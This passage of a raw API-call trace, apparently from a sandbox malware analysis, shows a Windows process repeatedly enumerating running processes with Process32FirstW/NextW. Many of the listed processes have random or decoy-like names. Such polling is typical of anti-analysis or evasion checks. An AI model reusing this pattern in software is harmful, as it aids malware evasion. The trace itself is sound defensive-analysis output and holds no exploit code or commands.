pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0128.141] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.142] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0128.143] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) 
returned 1 [0128.144] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0128.145] CloseHandle (hObject=0xbc) returned 1 [0128.145] Sleep (dwMilliseconds=0x12c) [0128.466] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0128.472] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.473] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0128.474] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0128.474] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0128.475] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0128.476] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0128.477] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0128.478] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0128.479] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0128.479] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0128.480] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.481] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.482] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.483] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.484] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.484] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0128.485] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.486] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.487] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0128.488] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.489] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0128.491] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0128.492] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0128.493] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0128.494] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.496] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0128.497] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0128.498] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0128.500] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0128.501] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0128.503] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0128.504] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0128.553] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0128.555] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 
| out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0128.556] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0128.558] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0128.559] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0128.560] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0128.561] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0128.562] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0128.564] Process32NextW (in: hSnapshot=0xc4, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0128.565] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0128.566] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0128.568] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0128.569] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0128.570] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0128.572] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.573] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0128.574] CloseHandle (hObject=0xc4) returned 1 [0128.574] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0128.582] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.583] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0128.584] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0128.584] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0128.585] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0128.586] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0128.587] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0128.588] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0128.588] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0128.589] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0128.590] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.590] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.591] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.592] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.593] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.594] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0128.594] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.595] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.596] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0128.597] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.599] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0128.658] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0128.659] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0128.660] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0128.662] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.663] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0128.665] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0128.666] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0128.668] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0128.669] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 